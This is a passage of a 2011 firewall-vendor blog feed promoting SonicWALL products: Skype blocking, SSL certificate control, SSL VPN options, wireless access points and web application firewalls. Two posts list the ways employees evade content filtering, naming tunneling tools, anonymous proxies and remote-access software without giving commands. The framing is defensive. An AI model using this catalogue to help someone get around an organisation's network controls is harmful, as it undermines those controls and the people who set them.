  <li>Allows needed users to make work-related calls  over the Internet saving your money.</li>
</ul>
<h3>How Skype works through the firewall</h3>
<p> Skype can use both UDP and TCP; the preferred protocol for best performance is  UDP.</p>
<p> Skype &ldquo;probes&rdquo; your firewall for open ports and can auto  detect a local web proxy.<br>
It can try first with UDP; if it fails it can switch to TCP and use the common web  access TCP ports 80(HTTP) and 443(HTTPS) for connectivity.</p>
<p> Note that it can even work through an authenticating web  proxy.</p>
<h3> How to block Skype</h3>
<p> Over the time administrators have come up with various solutions to block  Skype. Most of them involve allowing only HTTP and HTTPS traffic outbound through  the firewall; Skype is P2P and one cannot really block specific destinations.</p>
<ul style="list-style-type:disc; margin-left:30px">
  <li>If the use of the HTTP protocol is enforced over  TCP port 80, Skype will not be able to escape through this port as it uses a  proprietary protocol.</li>
  <li>If a SSL inspection solution is used, Skype will  not be able to escape through the TCP port 443 as it not uses TLS/SSL.</li>
  <li>If a standard web proxy is in place, Skype will  use CONNECT requests destined to IP addresses; the proxy can block such  requests.</li>
  <li>Use IPS signatures to block Skype if the network  firewall incorporates an IPS.</li>
</ul>
<h3>Manage access to Skype with a SonicWALL NGFW firewall</h3>
<p> Next Generation Firewalls(NGFW) like SonicWALL can control access to  applications per users or group of users.<br>
  <div align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/app_contrl.png" alt="" /></div>
  They include an automatically updated database of  application signatures; the administrator can block access to Skype for all  users except for the group of users that needs Skype.</p>
]]></description>
      <pubDate>Mon, 19 Dec 2011 17:44:18 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Protect the Network with Certificate Control]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/ssl-certificate-control/</link>
      <description><![CDATA[<p>We've all seen it.  We're browsing around the Internet looking for that latest Windows driver or the next big application for the sales department and just as we think we have hit pay dirt we get the following screen:</p>
<p><img src="http://www.dttstores.com/index.php/admin/cms_wysiwyg/directive/___directive/e3ttZWRpYSB1cmw9Ind5c2l3eWcvZmlyZXdhbGxzL3NzbC1jb250cm9sLWVycm9yLnBuZyJ9fQ,,/" alt="" /></p>
<p>Immediately our brain begins to race. &nbsp;Why is this site giving a certificate error? &nbsp;Has it been hacked? &nbsp;Is the admin too lazy to update the certificate? &nbsp;Is it really ok for me to click continue?</p>
<p>As seasoned IT admins we know the consequences of clicking "continue". &nbsp;We know that if we enter into a site with a funky certificate issue and download an app we may be inviting trouble. &nbsp;Unfortunately, our network users don't have the same staying power or foresight &nbsp;we do. &nbsp;They have their "eye on the prize" and will not let a little certificate error stop them from downloading what they are after.</p>
<p>&nbsp;</p>
<h2>Enter SonicWALL SSL Control</h2>
<p>SonicWALL's SSL Control feature allows you to setup the firewall to intercept these certificate errors before the end user receives it. &nbsp;This takes away the bypass control from the end user and puts it into your hands. &nbsp;</p>
<p><img src="http://www.dttstores.com/index.php/admin/cms_wysiwyg/directive/___directive/e3ttZWRpYSB1cmw9Ind5c2l3eWcvZmlyZXdhbGxzL3NzbC1jb250cm9sLW9wdGlvbnMucG5nIn19/" alt="" /></p>
<p>As you can see SonicWALL offers detection and/or blocking of several different kinds of certificate errors. &nbsp;By implementing this feature you have added another layer of security to your network.</p>
<p>&nbsp;</p>
<h2>SonicWALL SSL Control in Action</h2>
<p>This quick video demonstrates how the SSL Control feature works with the SonicWALL firewall.</p>
<p>
<object width="720" height="366" data="http://www.youtube.com/v/f8JQW6GGGHk?version=3&amp;hl=en_US&amp;rel=0" type="application/x-shockwave-flash">
<param name="data" value="http://www.youtube.com/v/f8JQW6GGGHk?version=3&amp;hl=en_US&amp;rel=0" />
<param name="allowFullScreen" value="true" />
<param name="allowscriptaccess" value="always" />
<param name="src" value="http://www.youtube.com/v/f8JQW6GGGHk?version=3&amp;hl=en_US&amp;rel=0" />
<param name="allowfullscreen" value="true" />
</object>
</p>]]></description>
      <pubDate>Fri, 16 Dec 2011 12:08:01 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicWALL Firewall SSL VPN versus SonicWALL SRA SSL VPN]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sra_vs_firewall_ssl_vpn/</link>
      <description><![CDATA[When it comes to SSL VPN, SonicWALL customers have two main  options:
<ul style="margin-left:25px; list-style-type:disc">
  <li>Use a Firewall SSL VPN; e.g. the SSL VPN feature  of the SonicWALL Firewalls.</li>
  <li>Use a dedicated SSL VPN Appliance; e.g. the  SonicWALL SRA Appliances.</li>
</ul>
<p align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/ssl_vpn_fw_sra.png" alt="" /></p>
<h3><a href="http://www.firewalls.com/sonicwall/sra">SonicWALL SRA</a>
</h3>
<p>
  <a href="http://www.firewalls.com/sonicwall/sra"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/sra_ico.png" alt="" style=" padding-right:15px" align="left" />SonicWALL  SRA series appliances</a> provide organizations with secure access to resources  along with PCI compliance through the award winning Web Application Firewall.<br>
<div class="add-to-holder"> <strong>For who</strong>:  for enterprises needing a modern secure remote access solution that can easily  accommodate the increasing number of remote workers and protect critical web  applications.</div></p>
<h3><u>Pros</u></h3>
<ul style="list-style-image: url(http://static.firewalls.com/media/wysiwyg/firewalls/green_tick_icon.jpg); margin-left:25px" >
  <li> A full-blown SSL VPN gateway; offers a rich SSL VPN experience.</li>
  <li>  A true virtual office; includes a fully featured SSL VPN portal allowing  broad access to resources from the browser.</li>
  <li> Unlimited number of remote users; out-of-the-box the top model includes a 25  concurrent users license.</li>
  <li> Spike Licensing; temporary capacity add-on license that allows you to rapidly  increase the remote user count in the event of an unexpected increase in demand;  e.g. during a natural disaster or an emergency.</li>
  <li> Solid network level access using the NetExtender SSL VPN client.</li>
  <li>  Mobile device support; the SSL VPN client is supported on many mobile platforms(Apple  iPhone, Apple iPad, Android, Windows Mobile, etc.).</li>
  <li> Flexible network design; single-arm or two-arm deployment modes.</li>
  <li>  Virtual cloud SSL VPN; also offered as a virtual appliance.<br>
  </li>
  <li>Excellent protection for web applications; an optional WAF service is  available which can help you achieve PCI compliance.<br>
  </li>
  <li> Application Acceleration; SSL offloading or caching to name a few. </li>
</ul>
<h3><u>Cons</u></h3>
<ul style="list-style-image: url(http://static.firewalls.com/media/wysiwyg/firewalls/red_cross_icon.jpg); margin-left:25px">
   <li>For Clean VPN it must be coupled with a SonicWALL firewall. </li>
 </ul>
<h3><a href="http://www.firewalls.com/sonicwall/sonicwall-firewall">SonicWALL Firewall SSL  VPN </a></h3>
<p><a href="http://www.firewalls.com/sonicwall/sonicwall-firewall"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/fw_ico.png" alt="sonicwall firewall ssl vpn" style="padding-right:15px"  align="left"/></a>Offers an  integrated security solution, an all-in-one security services appliance.<br>
<div class="add-to-holder">  <strong>For who</strong>:  for enterprises using an all-in-one security services box approach needing a  modern secure remote access solution that can accommodate a relative decent number  of remote workers.</div></p>
<h3><strong><u>Pros</u></strong></h3>
<ul style="list-style-image: url(http://static.firewalls.com/media/wysiwyg/firewalls/green_tick_icon.jpg); margin-left:25px">
  <li> The SSL VPN gateway is integrated, there is no need to deploy another  appliance and manage it separately.</li>
  <li> Solid network level access using the NetExtender SSL VPN client.</li>
  <li> Mobile device support; the SSL VPN client is supported on many mobile  platforms(Apple iPhone, Apple iPad, Android, Windows Mobile, etc.).</li>
  <li> Clean VPN; over the client’s VPN traffic multiple inspections can be  applied(IPS, Antivirus, Content filtering, etc.).</li>
</ul>
<h3><strong><u>Cons</u></strong></h3>
<ul style="list-style-image: url(http://static.firewalls.com/media/wysiwyg/firewalls/red_cross_icon.jpg); margin-left:25px">
  <li>Not all the features of the SSL VPN appliance are available;  e.g. all the portal’s features.</li>
  <li>Limited number of users; a dedicated SSL VPN appliance would be able to  accommodate better the increasing number of remote mobile workers.</li>
  <li>Limited protection for web applications(IPS level).</li>
  <li>No virtual cloud deployment option;  if  you plan to virtualize your SSL VPN infrastructure, the SonicWALL firewall is  offered only as a dedicated hardware-based appliance.<strong><u></u></strong></li>
</ul>
<p><strong>The SRA advantage</strong><br>
You can continue to add more user licenses whereas the firewall will eventually  run out of licenses and you may have to upgrade to the SRA to accommodate the  increasing mobile workforce. Additionally your remote users will benefit from a  true  virtual office and your critical web applications from modern protection.</p>
]]></description>
      <pubDate>Fri, 16 Dec 2011 02:37:08 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Expanding Your Wireless Network using the SonicPoint]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/expand_wireless_network_with_sonicpoint/</link>
      <description><![CDATA[<p>Mobile devices equipped with  wireless adapters like laptops, smart phones or tablets are increasing their  presence on the corporate network.</p>  
<div align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/needs_mobile.png" alt="" /></div>
<h3>Advantages of expanding your wireless  network </h3>
<p> The latest standard 802.11n offers around 300 Mbps of rated bandwidth in  theory; in practice if well designed, it will easily offer greater bandwidth  than 100 Mbps -&gt; high-bandwidth wireless LANs are possible.</p>
<ul style="list-style-type:disc; margin-left:30px">
  <li><strong>Rapid  deployments</strong>; there is no need to pull cables through walls and ceilings to wire  each PC. The wireless access point does not even require an AC power supply.</li>
  <li><strong>Mobility</strong>;  remove the need of a hard line for Internet and LAN access, thus the dependency  on fixed desks. Users are able to roam if needed without having to plug or  unplug any cables.</li>
  <li><strong>Scalability  and robustness</strong>; the wireless network can be easily extended and can  accommodate various topologies. Wireless networks can cope better with  disasters.</li>
  <li><strong>Simplicity  of the design</strong>; most of the network layout and functionality lays within the  access point.</li>
</ul>
<h3><a href="http://www.firewalls.com/sonicwall/sonicpoint-access-points">SonicWALL SonicPoints</a></h3>
<p> <a href="http://www.firewalls.com/sonicwall/sonicpoint-access-points">SonicWALL SonicPoints</a> are <a href="http://www.firewalls.com/sonicwall/sonicwall-wireless">wireless access points</a> specially engineered to work  with <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall">SonicWALL firewalls</a> to provide enterprise-level wireless access. They offer  secure and fast access to data, voice and video over high-bandwidth wireless  LANs.</p>
<ul style="list-style-type:disc; margin-left:30px">
  <li><strong>Easy  deployment and management</strong>; from the SonicPoint section of your SonicWALL  firewall's management Interface you can manage the SonicPoints connected to the  security appliance; the SonicPoint configuration can be provisioned  automatically once the device is connected and powered on.</li>
  <li><strong>Clean  Wireless</strong>; the wireless traffic is scrutinized and inspected in a similar way  with the wired network traffic.</li>
  <li><strong>Segment  wireless networks within a single access point</strong>; a single SonicWALL can  support up to eight SSIDs being able to offer both Open and WPA wireless  networks to clients simultaneously.</li>
  <li><strong>Integrated  Wireless Guest Services</strong>; used to provide Internet access to guests.</li>
  <li><strong>Enhanced  throughput and reliability</strong>; multiple antennas are utilized to achieve this.</li>
  <li><strong>High-bandwidth  wireless LANs</strong>; the latest<strong> </strong>802.11n  standard is supported.</li>
</ul>
<h3>Expanding Your Network with a  <a href="http://www.firewalls.com/sonicwall/sonicpoint-access-points">SonicPoint</a></h3>
<p> The combination of a <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall">SonicWALL firewall</a> and a <a href="http://www.firewalls.com/sonicwall/sonicpoint-access-points">SonicPoint</a> offers many features  that make it an excellent choice for many scenarios.</p>
<p> Using Virtual Access Point (VAP)  segmentation, with a single <a href="http://www.firewalls.com/sonicwall/sonicpoint-access-points">SonicPoint,</a> you can offer both Internet access to  guest users and secure access to the LAN and Internet to corporate workers; the  guest wireless network can be open or password protected while the corporate  wireless network will be secured with WPA2+EAP.</p>
<p> Granular firewall rules can be  applied to the entire wireless traffic, controlling all wireless clients'  communications to any host on the local network or Internet; security services  like IPS, gateway antivirus or content filtering can be applied individually to  each wireless zone.</p>
<p> The wireless IDS protects against  common types of illicit wireless activity.</p>
<p> The SonicPoint can receive power  from a Power over Ethernet(PoE) Injector for easy deployments where electrical  outlets are not available. Additionally, discreet deployments are possible with  light and logo covers, controllable LEDs(except power) and internal antennas.</p>
<p> A minimum amount of bandwidth can  be guaranteed to each wireless client.<br>
  Guest users with pre-defined  static IP settings on their wireless adapters can use the guest WLAN to access  the Internet; this is possible through the Dynamic Address Translation(DAT) feature.</p>
 <div align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/sonicpoint_diag.png" alt="" /></div>

<h3><a href="http://www.firewalls.com/sonic_point_over_view">SonicPoint features
</a></h3>
<ul style="list-style-type:disc; margin-left:30px">
  <li>Varying on the model: PoE or/and AC Adapter and either  internal or external antennas.</li>
  <li>Standards: 802.11 a/b/g/n.</li>
  <li>Security: WEP, WPA and WPA2; TKIP, AES ciphers.</li>
  <li>Wireless Authentication               : Open, PSK, EAP.</li>
  <li>MAC Filtering.</li>
  <li>Profile Auto-provisioning.</li>
  <li>Centralized WLAN management.</li>
  <li>Virtual Access Points (up to 8).</li>
  <li>Clean Wireless.</li>
  <li>Wireless IDS; rogue access point detection.</li>
  <li>Wireless Guest Services.</li>
  <li>Wireless Roaming with ESSID.</li>
  <li>Dynamic Address Translation(DAT).</li>
  <li>FairNet wireless bandwidth allocation.</li>
  <li>Turn on the wireless radio only when is needed.</li>
  <li>SSL VPN Enforcement(with SonicWALL SSL VPN  appliance).</li>
</ul>
]]></description>
      <pubDate>Wed, 14 Dec 2011 16:55:41 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[How Users Bypass Your Content Filtering solution]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/user_bypass_content_filtering/</link>
      <description><![CDATA[<p>The traditional approach administrators take when it comes  to controlling Internet access</p>
<ul style="margin-left:30px; list-style-type:disc">
  <li>When possible, allow only TCP ports 80(HTTP) and  443(HTTPS) outbound through the network firewall for most users.</li>
  <li>Additionally enforce the use of the HTTP  protocol over TCP port 80 and filter the web traffic(destination URLs, content,  etc.).</li>
  <li>In some cases a web proxy might be in place to  authenticate users.</li>
  <li>Normally traffic destined to TCP port 443(used  by HTTP over SSL) is considered opaque being encrypted and thus will not be  inspected; a non-transparent web proxy may filter it based on the host  addresses seen in the CONNECT method requests of web proxy clients.</li>
</ul>
<img src="http://static.firewalls.com/media/wysiwyg/firewalls/bypass-cf.jpg" alt="" />
<h3>Where administrators fail</h3>
<p> Users take advantage of the facts that:</p>
<ul style="margin-left:30px; list-style-type:disc">
  <li>The traffic sent to TCP port 443 is opaque to  the firewall; either it is encrypted with SSL or the firewall simply is not  aware about the protocol passed over TCP port 443(any non-SSL protocols like  SSH).</li>
  <li>The firewall has limited visibility into HTTP  traffic; the firewall does enforce the use of HTTP over TCP port 80 but does  not look very deep into the application layer.</li>
  <li>When a complex application uses additional ports  and these will be allowed outbound through the firewall, users may access other  external services on these ports.</li>
</ul>
<h3>HTTPS is opaque to the firewall</h3>
<p> TCP port 443 is supposed to be used by HTTP over SSL. Naturally since SSL  encrypts HTTP traffic, the firewall has no way to inspect what’s inside the SSL  tunnel; it can be HTTP or any other protocol.</p>
<p> Some firewalls can detect if non-SSL traffic is passed over  TCP port 443 and block them; others don’t. In any case, a content filtering  solution cannot inspect SSL encrypted traffic if the firewall is not able to  decrypt it.</p>
<p> Over the SSL tunnel users can browse the web for example.</p>
<h3> Blacklist URL filtering solutions</h3>
<p> Administrators block access to inappropriate sites using a URL filtering  solution; e.g. bad known destinations.</p>
<p> Users setup their own proxies for tunneling traffic over  HTTP on obscure destination servers which are not caught by a blacklist URL  filtering solution; probably they fall into the unknown category and this is  not blocked due to usability reasons. Additionally SSL can be used to access  such sites.</p>
<p> Through the tunnels users access whatever destinations they  like bypassing the URL filtering solution.</p>
<h4> Limited visibility into HTTP traffic</h4>
<p> An HTTP tunnel channel creates a legit HTTP connection; users  tunnel through HTTP requests other protocols, like SSH. Over SSH users can browse  the web for example.</p>
<p> The firewall only performs basic  filtering on the HTTP application protocol and cannot detect its misuse:</p>
<ul style="margin-left:30px; list-style-type:disc">
  <li>URL filtering(Filtering based on the URL).</li>
  <li>File types or extension filtering.</li>
  <li>Scans for malware and viruses.</li>
  <li>Includes a few signatures to block potential  unwanted applications while users have access to tenths of such applications.</li>
</ul>
<h3>Limited application visibility</h3>
<p> The firewall does not have signatures to identify and allow or block the needed  applications meaningless of destinations and protocols.</p>
<p> As we saw above, an unwanted application can escape over  regular ports(TCP port 80 and 433) or application protocols(HTTP or HTTPS).</p>
<p> It’s not enough to filter per port or protocol; the  administrators must filter per applications or categories of applications.</p>
]]></description>
      <pubDate>Sat, 03 Dec 2011 17:13:28 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[What is a Web Application Firewall (WAF)?]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/what_is_waf/</link>
      <description><![CDATA[<h1>What is a Web Application Firewall (WAF)?</h1> 
<h3> A WAF is a tool used to protect web applications and web servers from attacks.</h3> <p> A WAF is deployed in front of a web application (or a web server) and intercepts the traffic between the clients and the application in order to:</p>
<table>
  <tr>
    <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/waf_icon.jpg" alt="" /></td>
    <td><ul> <li>Prevent unwanted user input to reach the application.</li> <li>Prevent unwanted content to be leaked by the application.</li> <li>Monitor the application traffic flow.</li> <li>Log transaction data.</li> </ul></td>
  </tr>
</table>

 <h3>How a WAF works?</h3> <p> A WAF can be an appliance or a server plugin. For example a hardware appliance that you deploy in front of your web server or a plugin that you install on your web server.</p> <p> A WAF operates by using two main models:</p>
 <table>
   <tr>
     <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/black_list_icon.jpg" alt="blacklist " /></td>
     <td><strong> A blacklist or negative model that denies what is known to be bad</strong><br>
     For basic protection, similar with an IPS but with a greater level of application intelligence, a WAF can use generic signatures for preventing well known attacks and specific signatures for attacks exploiting a particular web application&rsquo;s vulnerabilities. A simple example: deny a certain malicious HTTP GET request and permit everything else.     </td>
   </tr>
   <tr>
     <td><img src="http://static.firewalls.com/media/wysiwyg/firewalls/white_list_icon_1.jpg" alt="whitelist " /></td>
     <td><strong>A whitelist or positive model that permits only what is known to be good</strong><br>
For advanced protection, in addition to the signatures, another type of logic is used: rules that define what is explicitly allowed. A simple example: allow just HTTP GET requests for a specific URL and deny everything else.</td>
   </tr>
 </table> <div align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/airlock.jpg" alt="" /></div>
<h3> Why a WAF is needed?</h3> <p> Nowadays web applications are used for sensitive operations like online banking, retail sales, webmail or remote access. In many cases these applications are directly exposed to the Internet.</p> <div align=" ta;;"> In an ideal world, the web applications will be bug free. In the real world it is impossible to code an application without security vulnerabilities. And sometimes you can&rsquo;t patch the application or you need some extra time to patch it. Here is where the WAF helps.<br> A WAF is used to &ldquo;fix&rdquo; the security vulnerabilities without touching the applications; it can block the exploit of the vulnerabilities, either known or unknown.</div> <p> Additionally, a WAF is able to log full transaction data so you can monitor the operations of your web application.</p> <h3> Why do you need a WAF?</h3> <p> Hackers attack web applications to steal users&rsquo; credentials, extract information from databases, steal money, manipulate polls or create denial of services.</p> <p><strong> If you have a web application exposed to the Internet and your business relies on it, then attacks against it can disrupt your business operations, cause financial loss and affect your reputation.</strong></p>  You can use a WAF for: <ul> <li>Preventing technical application attacks (e.g. XSS, SQL Injection).</li> <li>Preventing business logic attacks. These target flaws in the logic of a business application; they abuse the functionality of the application.</li> <li>Virtual patching; fix security vulnerabilities in your web application without touching the application.</li> <li>Web application hardening; reduce the attack surface.</li> <li>Monitoring your web application and detecting when attacks occur.</li> </ul><h3>Fears associated with WAF deployments</h3> <table class="data-table" id="product-attribute-specs-table"> <tr class="odd"> <td width="157" valign="top"><strong> Service disruption due to false positives </strong></td> <td width="481" valign="top"><p>The WAFs have matured and accurate detection with a minimum of false positives(without denying legit traffic) is now possible.</p></td> </tr> <tr> <td width="157" valign="top"><p><strong>Complicated configuration</strong></p></td> <td width="481" valign="top"><p>Some WAFs feature a learning or profiling mode in which rules are automatically created for a web application. This is very useful for custom applications.</p></td> </tr> <tr  class="odd"> <td width="157" valign="top"><p><strong>Big impact on the current network layout</strong></p></td> <td width="481" valign="top"><p>Transparent, drop-in deployments can be used to minimize this.</p></td> </tr> </table> <h3>Conclusion</h3> <p> A WAF is a tool specifically designed to protect web applications. The level of protection offered by a WAF for web applications is unmatched by existing IPS solutions.</p> ]]></description>
      <pubDate>Fri, 02 Dec 2011 19:09:00 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicWALL Launches Mobile Connect App for iOS]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/mobile_connect_app/</link>
      <description><![CDATA[<h3>App Offers Secure SSL VPN Connectivity to Corporate Network Resources for Today's Mobile Workforce
</h3>
<table>
  <tr>
    <td height="120"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/ios_mobile_connect_200x180.jpg" alt="" /></td>
    <td>SonicWALL, Inc.,today announced the <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/mobile-connect" >SonicWALL Mobile Connect App</a> is now available on the App Store(SM) for download to Apple devices such as iPad® and iPhone®. For users of SonicWALL's<a href="http://www.firewalls.com/sonicwall/sra"> SSL VPN</a> and <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall" >Next-Generation Firewall product lines</a>, the <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/mobile-connect" >new SonicWALL Mobile App</a> enables anytime, anywhere secure remote access and connectivity from   Apple devices such as the iPad and iPhone to all network resources. A   single unified <a href="http://www.firewalls.com/sonicwall/sra">SSL VPN</a> client, <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/mobile-connect" >Mobile Connect</a> is supported across all current<a href="http://www.firewalls.com/sonicwall/sra"> SonicWALL Secure Remote Access</a> (<a href="http://www.firewalls.com/sonicwall/sra">SRA</a>) and SonicWALL <a href="http://www.firewalls.com/sonicwall/sra" >Aventail E-Class SRA</a>, as well as <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-tz-firewalls" >SonicWALL TZ,</a> <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall" >Network Security Appliance</a> (NSA), <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-nsa-series" >E-Class NSA</a> and SuperMassive<strong> </strong>E10000 Series firewalls. Mobile Connect runs on iOS 4.2 and higher.<u></u></td>
  </tr>
</table>
<p>The <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/mobile-connect" >SonicWALL Mobile Connect App</a> provides users "VPN on Demand" and encrypts traffic whenever users   attempt to access protected internal resources. Further capabilities are   added when <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/mobile-connect" >Mobile Connect</a> users communicate through a SonicWALL firewall. Network administrators can enable <a href="http://www.firewalls.com/sonicwall/sonicpoint-access-points" >Clean VPN</a> (SonicWALL Gateway Anti-Virus, Anti-Spyware and Intrusions Prevention   scanning over VPN connections) to afford iOS users the same level of   protection as if they were on the internal network, and ensure that   communications relayed through the iOS devices are clean of malware.   Additionally, network administrators can utilize SonicWALL Application Intelligence and Control functionality to identify which iOS apps should receive critical   bandwidth. This assures performance for key business, education and   medical applications, while throttling down other bandwidth intensive   applications not deemed important to the enterprise or school.</p><iframe width="640" height="360" src="http://www.youtube-nocookie.com/embed/nkvQeImEAi0?rel=0&amp;hd=1" frameborder="0" allowfullscreen></iframe>
<p>"Everyone   knows that iPhones and iPads are revolutionary devices that have   enabled a level of mobile productivity we haven't seen before," said   Mark Bouchard, founder of AimPoint Group, LLC. "Mobile Connect makes it   simple and straightforward for enterprises to embrace this game-changing   platform by allowing millions of SonicWALL customers to securely access   corporate networks and boost their mobile productivity even further."<u></u><u></u></p><div align="center"><img src="http://static.firewalls.com/media/wysiwyg/firewalls/ios_mobile_connect_690.jpg" alt="" /></div>
<p>For internal users of iOS devices, IT administrators are already able to utilize SonicWALL's <a href="http://www.firewalls.com/sonicwall/sonicpoint-access-points" >Clean Wireless</a> (data encryption and Gateway Anti-Virus, Anti-Spyware and Intrusion   Prevention over WLAN networks) as well as SonicWALL Content Filtering   services to meet compliance and policy requirements. Now, with the <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/mobile-connect" >Mobile Connect App</a>, users and organizations can be protected while traveling and accessing networks from public hotspots.<u></u><u></u></p>
<p>"iPads   and iPhones have become the overwhelming choice for employees who   demand anytime anywhere productivity," said Patrick Sweeney, vice   president of product management and corporate marketing at SonicWALL.   "Our <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/mobile-connect" >Mobile Connect App</a> lets companies extend their security policy to meet the stringent needs   of enterprise, government and education institutions, while employees   travel outside of the protected perimeter. This will help enable greater   workforce productivity." <u></u><u></u></p>
<p>By deploying the <a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/mobile-connect" >SonicWALL Mobile Connect App</a>,   companies can take full advantage of the power and innovation of iPad   and iPhone—simply and securely. IT organizations can now support iPad   and iPhone users by giving them secure access to network resources,   including shared folders, client-server applications, intranet sites,   email and more.</p>
]]></description>
      <pubDate>Thu, 01 Dec 2011 14:21:39 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[5 Ways User Bypass Your Content Filtering]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/5_ways_to_bypass_content_filtering/</link>
      <description><![CDATA[<p>When it comes to bypass the content filtering policies set on  the corporate gateway, users have a lot of imagination.</p>
<p> In most cases users take advantage of the facts that traffic  sent to TCP port 443 is opaque to the firewall and the firewall has limited  visibility into HTTP traffic.</p>
<p> Some bypass methods used:</p>
<ul  style="margin-left:30px; list-style-type:disc">
  <li>Software tunneling applications.</li>
  <li>Anonymous web proxy sites.</li>
  <li>Tunneling Proxy Servers.</li>
  <li>Remotely accessing a computer.</li>
  <li>Cache websites.</li>
  <li>Access sites via email.</li>
</ul>
<h3>Software tunneling applications</h3>
<p> There are many software applications, either browser add-ons or standalone applications,  that users can install and use to tunnel their web traffic through the  firewall. To name a few:</p>
<ul  style="margin-left:30px; list-style-type:disc">
  <li>UltraSurf.</li>
  <li>Tor.</li>
  <li>JonDo.</li>
  <li>Identity Cloaker.</li>
  <li>Various VPN services, some based on OpenVPN.</li>
</ul>
<p>Some of these can tunnel traffic through the corporate web  proxy too, even if it requires authentication. Note that the users’ traffic can  be encrypted in the process.</p>
<p> To understand how many applications, for example alternatives  to UltraSurf exist, you can visit: http://alternativeto.net/software/ultrasurf/.</p>
<h3> Anonymous web proxy sites</h3>
<p> When users cannot install any software on their machines, they use their browsers  and access anonymous proxy web sites. On these sites, they enter the URL of the  destination they want to visit, and they will access this destination through  the proxy.</p>
<p> Some popular such web sites:</p>
<ul  style="margin-left:30px; list-style-type:disc">
  <li>Proxify.</li>
  <li>Hide My Ass.</li>
</ul>
<p>A list of anonymous proxy web sites can be found at: https://proxy.org/cgi_proxies.shtml.</p>
<p> Note that users can buy themselves a domain and host a web  site using Glype, CGIProxy or PHProxy to achieve the very same thing.</p>
<div class="add-to-holder">
  <p>A web-based proxy script is hosted on the  website which provides proxy services to users via a web browser. The proxy  service downloads requested web pages and forwards them to the users.</p>
</div>
<h3>Tunneling Proxy Servers</h3>
<p> Users can setup HTTP or SSL tunnel channels; through these channels SSH can be  tunneled. Over SSH users can browse the web.</p>
<ul  style="margin-left:30px; list-style-type:disc">
  <li>Tunnel through HTTP requests; e.g. httptunel  utility.</li>
  <li>Tunnel through SSL; e.g. stunnel utility.</li>
  <li>Tunnel through the corporate HTTPS proxy in case  one exists; e.g. corkscrew or Proxytunnel utilities. The HTTPS proxy is an HTTP  proxy that supports CONNECT requests.</li>
  <li>Use either SSH, OpenVPN or proprietary protocols  directly over TCP port 443 through the firewall.</li>
</ul>
<h3>Remotely accessing a computer</h3>
<p> Users can access their own computers at home with software normally used for the  remote administration of a PC/ server. From the home computer they can browse  freely the web. To name a few remote access applications:</p>
<ul style="margin-left:30px; list-style-type:disc">
  <li>LogMeIn.</li>
  <li>TeamViewer.</li>
  <li>GoToMyPC.</li>
  <li>Remote Desktop Web Connection.</li>
</ul>
<p>Some of them require the installation of a client, some  not(e.g. use Broswer+Java).</p>
<h3> Cache websites</h3>
<p> Certain sites cache web content(e.g. search engines like Google have an option  to display the cached content of an URL) and others archive web sites to preserve  them at a unique moment in the past(e.g. Internet Archive: Wayback Machine).</p>
<p> When accessing the content of a needed web site, the content  will not be served from the original site; instead it will be served from the  caching site(Google Cache) or from the archive sites. This means that your URL  filtering policy for destinations will not apply anymore.</p>
<h3> Access sites via email</h3>
<p> Some services like Web2Mail allow users to receive web pages or to search the  web by email.</p>
<br>
<br>
]]></description>
      <pubDate>Tue, 29 Nov 2011 16:37:42 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Video Demonstration: How Users Bypass Your Content Filtering]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/how_bypass_sonicwall_content_filtering/</link>
      <description><![CDATA[<p>It's not a secret that, while at work, many users attempt to  bypass web content restrictions. In this video you will learn how users can  bypass content filtering policies created on your corporate firewall using anonymous  proxy service web sites.</p>
<p> The firewall can deny HTTP access to such proxies, however  when they use HTTPS(HTTP over SSL), this is no longer possible since the  traffic is encrypted. Many anonymous proxy service web sites are able to  utilize SSL these days creating security issues for enterprises.</p>
<ul style="margin-left:30px; list-style-type:disc">
  <li>A SonicWALL firewall can inspect SSL traffic  with its feature called DPI-SSL.</li>
  <li>This allows it to intercept the users' HTTPS traffic  destined to the anonymous proxies, decrypt it and apply content filtering over  it.</li>
  <li>The end result will be that access over SSL to anonymous  proxy service web sites will be denied.</li>
</ul>
<br><div align="center">
